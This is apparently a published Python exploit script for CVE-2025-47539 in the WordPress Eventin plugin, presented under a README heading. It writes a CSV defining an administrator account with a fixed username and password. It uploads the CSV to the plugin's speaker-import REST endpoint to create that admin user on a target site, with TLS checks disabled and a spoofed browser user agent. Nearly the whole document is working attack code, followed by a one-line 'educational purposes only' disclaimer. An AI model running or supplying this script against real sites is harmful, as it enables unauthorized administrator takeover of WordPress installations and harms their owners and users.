README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import requests
import csv
import os
import sys
from urllib.parse import urlparse
class Nxploited:
def __init__(self, target_url):
self.url = self.validate_url(target_url)
self.endpoint = "/wp-json/eventin/v2/speakers/import"
self.session = self.setup_session()
self.headers = {"User-Agent": self.user_agent()}
self.csv_file = "user.csv"
self.name = "Nxploited (Khaled_alenazi)"
self.email = "[email protected]"
self.username = "NxPloted"
self.password = "nxploit123"
self.role = "administrator"
def validate_url(self, url):
parsed = urlparse(url)
if not parsed.scheme:
url = f"http://{url}"
return url.rstrip('/')
def setup_session(self):
s = requests.Session()
requests.packages.urllib3.disable_warnings()
s.verify = False
return s
def user_agent(self):
return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def generate_csv(self):
data = [[self.name, self.email, self.username, self.password, self.role]]
with open(self.csv_file, mode='w', newline='', encoding='utf-8') as f:
writer = csv.writer(f)
writer.writerow(["name", "email", "username", "password", "role"])
writer.writerows(data)
def exploit(self):
self.generate_csv()
full_url = f"{self.url}{self.endpoint}"
files = {"speaker_import": (self.csv_file, open(self.csv_file, "rb"), "text/csv")}
try:
response = self.session.post(full_url, files=files, headers=self.headers)
if "Successfully imported" in response.text:
print("[+] Exploitation succeeded")
print("[+] Response:")
print(response.text.strip())
print("\n[+] Exploited Account Details")
print(f" Name : {self.name}")
print(f" Email : {self.email}")
print(f" Username : {self.username}")
print(f" Password : {self.password}")
print(f" Role : {self.role}")
else:
print("[-] Exploitation failed")
print(response.text.strip())
except Exception as e:
print(f"[-] Error occurred: {e}")
def cleanup(self):
if os.path.exists(self.csv_file):
os.remove(self.csv_file)
def print_banner():
banner = r'''
###### ## ## ######## ####### ##### ####### ######## ## ######## ######## ####### #######
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ###### ####### ####### ## ## ####### ####### ####### ## ## ## ####### ####### ########
## ## ## ## ## ## ## ## ## ######### ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
###### ### ######## ######### ##### ######### ###### ## ## ###### ####### #######
'''
print(banner)
print("By:Nxploited (Khaled_alenazi) | [email protected]")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)")
parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g. http://target.com)")
args = parser.parse_args()
print_banner()
tool = Nxploited(args.url)
tool.exploit()
tool.cleanup()
print("\nExploit: By: Nxploited (Khaled_alenazi)")
print("Use this script for educational purposes only. I am not responsible for your actions.")
if __name__ == "__main__":
main()